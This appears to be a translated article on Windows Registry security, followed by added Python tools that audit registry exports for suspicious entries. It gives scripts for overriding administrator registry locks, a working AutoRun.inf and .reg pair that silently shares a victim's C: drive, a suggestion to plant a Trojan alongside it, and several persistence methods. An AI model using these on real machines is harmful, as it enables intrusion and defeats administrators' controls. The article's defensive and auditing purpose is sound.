Simplified advanced registry usage Security

Source: Internet
Author: User

The author has found that most books about the Registry concentrate on personalized settings and system optimization, but pay little attention to the increasingly rampant "hacking" behavior, Trojan viruses and nasty malicious websites of the real network environment. I will elaborate on the security side of the Registry here, hoping it proves useful.
I. Registry and "hacker" behavior

Hackers exploit the Registry in three ways:

A: Break through some network management software restrictions

B: Share a specific hard disk partition and run the specified program

C: Start hacker programs. Of these three, B and C cause the greatest harm.

1. Break through some network management software restrictions

Some Internet cafe administrators take their restrictions to extremes. As a result, the "free warriors" turned to the registry to break through them.


Can Word also unlock the registry? That's right! We use the "macro" facility Microsoft provides in Word. Surprised? The method is: run Word and write the "Unlock" macro shown below, then run it to unlock the registry:

Sub Unlock()
    ' Policy key that holds the DisableRegistryTools value
    Dim RegPath As String
    RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
    ' With an empty FileName, Word's PrivateProfileString reads and writes the registry
    System.PrivateProfileString(FileName:="", Section:=RegPath, Key:="DisableRegistryTools") = "0"
End Sub

③ Unlock using JavaScript and VBScript

Script languages can unlock the Registry, too. Many malicious websites rely on exactly this to lock our registry; now we use the same approach in reverse to unlock it. Only the core JavaScript code is given here. Use Notepad to edit the following lines, save them as any file with the .js suffix, and double-click it.

// Create the Windows Script Host shell object, which exposes RegWrite
var WSHShell = WScript.CreateObject("WScript.Shell");

WSHShell.Popup("Unlock Registry");

// Set the policy value back to 0 so the Registry Editor is allowed again
WSHShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", 0, "REG_DWORD");

Note: When using JS to operate on a key path, write each backslash as a double backslash ("\\") and end each statement with ";".

④ Unlock the registry using the SCR file

As we all know, an SCR file is a screen saver file. How can an SCR file unlock the registry? The trick is to rename the Registry Editor, regedit.exe, to Regedit.scr. Then right-click the desktop, select "Properties" from the context menu, open the "Screen Saver" tab of the "Display Properties" dialog box, find the screen saver named "Regedit" in the "Screen Saver" drop-down list (Figure 1), and click the "Preview" button to open the Registry Editor. Change the key value, restart the computer, and the registry is unlocked! (Remember to rename the SCR file back afterwards!)


Figure 1

⑤ Use the INF file to unlock

In Windows there is a driver installation file with the suffix INF. It is actually a script that is executed by an interpreter, and it contains all the installation information of a device driver, including statements that modify the Registry, so we can also use an INF file to unlock the registry.

[Version]
Signature="$CHICAGO$"

[DefaultInstall]
; DelReg removes the registry values listed in the named section
DelReg=UnLock

[UnLock]
; root, subkey, value name: deletes the DisableRegistryTools policy value
HKCU,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools

Save the above content as a file with the suffix ".inf". Then just right-click it and select "Install" in the pop-up menu to unlock the Registry (Figure 2).


Figure 2

2. Share a specific hard disk partition and run the specified program

First, open Notepad and edit a .reg file as follows:

REGEDIT4

; here only the C drive is shared; add a key per drive for more
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$]
"Path"="C:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:

Save it as ShareDrives.reg. Then open Notepad again and enter the following content:

[AutoRun]
; the /s parameter imports the registry file silently, without any prompt
open=regedit /s ShareDrives.reg

Save it as AutoRun.inf.

Copy the two files to the root directory of the drive the other party has shared. Then, as soon as that shared drive is double-clicked, AutoRun.inf runs and ShareDrives.reg is imported into the Registry. After the other party restarts the system, their C drive is shared. Think about it: what would happen if a Trojan's name were added here and a configured Trojan server copied along with these files?

So how do we deal with such attacks? An AutoRun.inf in the root directory of a hard disk can only run its program because the AutoRun feature is enabled for hard disks, so we can permanently disable that feature; then, even if the root directory contains an AutoRun.inf file, the operating system will not run the specified program. Taking Win98 as an example: open the Registry Editor, find the key [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer], locate the binary value "NoDriveTypeAutoRun" in the right pane, and change its data from the default "95 00 00 00" to "9d 00 00 00". I will not explain the principle here.
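The following is an added example (not code from the original article) that shows, on the defensive side, what the two artifacts above look like to a checker: it parses an AutoRun.inf body for the entries that launch a program, and it treats NoDriveTypeAutoRun as the bitmask it is, so the "95 00 00 00" to "9d 00 00 00" change can be explained and generalized to any drive type. The bit-to-drive-type names follow the Win32 GetDriveType order, which is an assumption stated in the code rather than something the article spells out; the sample AutoRun.inf is constructed from the article's own lines. It runs offline and touches no live registry.

```python
"""Reason about the NoDriveTypeAutoRun mask and inspect an AutoRun.inf.

Added example, not code from the original article. Works on constructed
text and integer values only; nothing here reads or writes a live registry.
Drive-type bit names follow the Win32 GetDriveType() order (assumption).
"""
import configparser

# NoDriveTypeAutoRun is a bitmask: bit n disables AutoRun for drives whose
# GetDriveType() result is n. Bits 0x01 and 0x80 both cover "unknown" types.
DRIVE_TYPE_BITS = {
    "unknown": 0x01,
    "no_root_dir": 0x02,
    "removable": 0x04,
    "fixed": 0x08,        # hard disk partitions, the case the article addresses
    "remote": 0x10,       # network drives
    "cdrom": 0x20,
    "ramdisk": 0x40,
    "unknown_high": 0x80,
}

# The article's before/after data for the REG_BINARY value ("95 00 00 00" -> "9d 00 00 00").
ARTICLE_BEFORE = 0x95
ARTICLE_AFTER = 0x9D


def autorun_disabled_for(mask, drive_type):
    """True when the mask disables AutoRun for the named drive type."""
    return bool(mask & DRIVE_TYPE_BITS[drive_type])


def disable_autorun_for(mask, *drive_types):
    """Return a mask with AutoRun disabled for the given types, keeping other bits."""
    for drive_type in drive_types:
        mask |= DRIVE_TYPE_BITS[drive_type]
    return mask


def newly_disabled(before, after):
    """Name the drive types whose AutoRun the change from before to after disables."""
    added = after & ~before
    return sorted(name for name, bit in DRIVE_TYPE_BITS.items() if added & bit)


def launching_entries(inf_text):
    """Parse AutoRun.inf text and return (key, value) pairs that launch a program.

    'open' and 'shellexecute' run when the drive is opened or double-clicked;
    'shell\\<verb>\\command' entries run when that context-menu verb is chosen.
    """
    parser = configparser.RawConfigParser(delimiters=("=",), strict=False)
    parser.read_string(inf_text)
    # Section names are case-sensitive in configparser; AutoRun.inf is not.
    section = next((s for s in parser.sections() if s.lower() == "autorun"), None)
    findings = []
    if section is not None:
        for key, value in parser.items(section):
            key = key.lower()
            if key in ("open", "shellexecute") or (
                key.startswith("shell\\") and key.endswith("\\command")
            ):
                findings.append((key, value.strip()))
    return findings


# Constructed sample: the AutoRun.inf from the article, with a ';' comment line.
SAMPLE_AUTORUN_INF = """\
[AutoRun]
; /s imports the .reg file silently, without a confirmation prompt
open=regedit /s ShareDrives.reg
"""

if __name__ == "__main__":
    print("launching entries:", launching_entries(SAMPLE_AUTORUN_INF))
    print("95 -> 9d newly disables:", newly_disabled(ARTICLE_BEFORE, ARTICLE_AFTER))
    print("all types disabled: 0x%02X" % disable_autorun_for(0, *DRIVE_TYPE_BITS))
```

Running the script reports that the article's change switches on exactly the "fixed" (hard disk) bit, and that setting every bit gives 0xFF, the mask that disables AutoRun for all drive types.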

3. Start hacker programs

The purpose of using the registry to start a hacker program is to run it automatically at startup; this is also one of the common self-starting methods of many Trojan viruses. The usual technique is to add the hacker program's name and parameters to the corresponding registry key value. The computer then loads that registry entry every time it starts, which lets the hacker stay resident in memory. More concealed methods are detailed in the "Registry and Virus" section.

Open the Registry Editor and view the following information:

All key values starting with "Run" under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion;

All key values starting with "Run" under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion;

All key values starting with "Run" under HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion.

If an unknown key value is found there, it is likely that a program has been implanted illegally.

II. Registry and Virus

Next let's look at how viruses use the registry. Generally, a virus uses the registry to obtain basic information about the system, such as the operating system type, the installed services, and the versions of IE, Outlook and other application software; this is mainly to detect and exploit system and software vulnerabilities. More importantly, the virus pursues the same goal as a hacker program through the Registry: self-starting at boot and staying resident in memory. Only in this way can the virus infect other machines and files and get the opportunity to "destroy" them.

Open the Registry Editor and find:

All key values starting with "Run" under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion;

All key values starting with "Run" under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion;

All key values starting with "Run" under HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion.

Most viruses quietly settle into one of these three locations. In that case we only need to delete the corresponding key value and then delete the virus program itself.

In addition, a virus can register itself as a system service to start even more covertly. The basic principle is that in Win2K a service whose "Startup Type" is set to "Automatic" is run by the system at startup; so the virus only needs to add itself as a system service with "Startup Type" set to "Automatic", and it runs every time the system starts. Its location in the registry is as follows:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ServiceName\Parameters]
"Application"="C:\\winnt\\system32\\ServiceName.exe"

Here ServiceName is the name of the virus.

However, registering as a system "service" has a drawback: the program can be seen in the "Startup" and "Services" tabs of the System Configuration Utility (run "Msconfig" from "Start > Run"). Is there an even more concealed way? The answer is yes. Run "Gpedit.msc" from "Start > Run" to open "Group Policy"; under "Local Computer Policy" there are two branches, "Computer Configuration" and "User Configuration". Expand "User Configuration > Administrative Templates > System > Logon", double-click the item "Run these programs at user logon" to open its properties, select "Enabled" on the "Settings" tab, and click the "Show" button to bring up the "Show Contents" window. Click the "Add" button, enter the path of the program to be started in the text box of the "Add Item" window, and click OK (Figure 3).


Figure 3
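As an added example (not code from the original article), here is a small offline auditor for the locations this article tells the reader to inspect: the Run* keys under HKLM, HKCU and HKU\.Default, the service Parameters key with its "Application" value, the LanMan share keys from the sharing section, and the Policies\System key whose DisableRegistryTools value the unlocking section deals with. It works on a REGEDIT4-style export such as regedit produces (that layout is the assumption), so the inspection can be scripted or repeated on a saved export instead of being done by eye. The Policies\Explorer\Run path in the list is where the "Run these programs at user logon" Group Policy setting described above is stored; the sample export is constructed, and its Run entries and service name are made up.

```python
"""Audit a REGEDIT4-style .reg export for the locations the article discusses.

Added example, not code from the original article. It parses exported text
offline and never writes to a registry. Assumption: the export has the layout
regedit produces (REGEDIT4 header, [key] lines, "name"=value lines, '@' for
a key's default value).
"""
import re

# (regex on the key path, label). Matching on the "Run" prefix covers Run,
# RunOnce, RunServices and RunServicesOnce alike.
WATCHED = [
    (r"^HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "HKLM Run*"),
    (r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "HKCU Run*"),
    (r"^HKEY_USERS\\\.Default\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "HKU .Default Run*"),
    # storage location of the "Run these programs at user logon" policy
    (r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", "policy logon Run"),
    (r"^HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\[^\\]+\\Parameters$", "service Parameters"),
    (r"^HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\", "LanMan share"),
    (r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System$", "Policies System"),
]

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)\s*=\s*(.*)$')


def parse_reg(text):
    """Return [(key_path, {value_name: raw_value})] in file order."""
    keys, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or line.upper() == "REGEDIT4":
            continue
        m = KEY_RE.match(line)
        if m:
            current = (m.group(1).lstrip("-"), {})  # a leading '-' marks key deletion
            keys.append(current)
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = m.group(1) if m.group(1) is not None else "@"
            current[1][name] = m.group(2)
    return keys


def label_for(key_path):
    """Return the label of the first WATCHED pattern matching the key, or None."""
    for pattern, label in WATCHED:
        if re.match(pattern, key_path, re.IGNORECASE):
            return label
    return None


def audit_reg(text):
    """List every value under a watched key as (label, key_path, value_name, raw_value)."""
    return [
        (label_for(key_path), key_path, name, raw)
        for key_path, values in parse_reg(text)
        if label_for(key_path) is not None
        for name, raw in values.items()
    ]


def shared_drives(text):
    """Return (share name, raw Path value) for every LanMan share key in the export."""
    return [
        (key_path.rsplit("\\", 1)[-1], values.get("Path", ""))
        for key_path, values in parse_reg(text)
        if label_for(key_path) == "LanMan share"
    ]


def registry_tools_disabled(text):
    """True when Policies\\System carries a non-zero DisableRegistryTools dword."""
    for key_path, values in parse_reg(text):
        if label_for(key_path) == "Policies System":
            raw = values.get("DisableRegistryTools", "dword:00000000").lower()
            return raw.startswith("dword:") and int(raw[6:], 16) != 0
    return False


# Constructed sample export covering the article's locations; the Run entries
# and the service name are made up for this example.
SAMPLE_EXPORT = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"updater"="C:\\WINDOWS\\TEMP\\update.exe /hide"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ServiceName\Parameters]
"Application"="C:\\winnt\\system32\\ServiceName.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$]
"Path"="C:\\"
"Flags"=dword:00000192

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
"""

if __name__ == "__main__":
    for finding in audit_reg(SAMPLE_EXPORT):
        print("%-18s %s -> %s = %s" % finding)
    print("shares:", shared_drives(SAMPLE_EXPORT))
    print("regedit locked:", registry_tools_disabled(SAMPLE_EXPORT))
```

Every value under a watched key is reported rather than judged: the point of the Run*, policy Run and service Parameters listings is that each program they name has to be accounted for by the administrator, and a LanMan share or a non-zero DisableRegistryTools value on a machine where nobody configured one is the finding itself.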
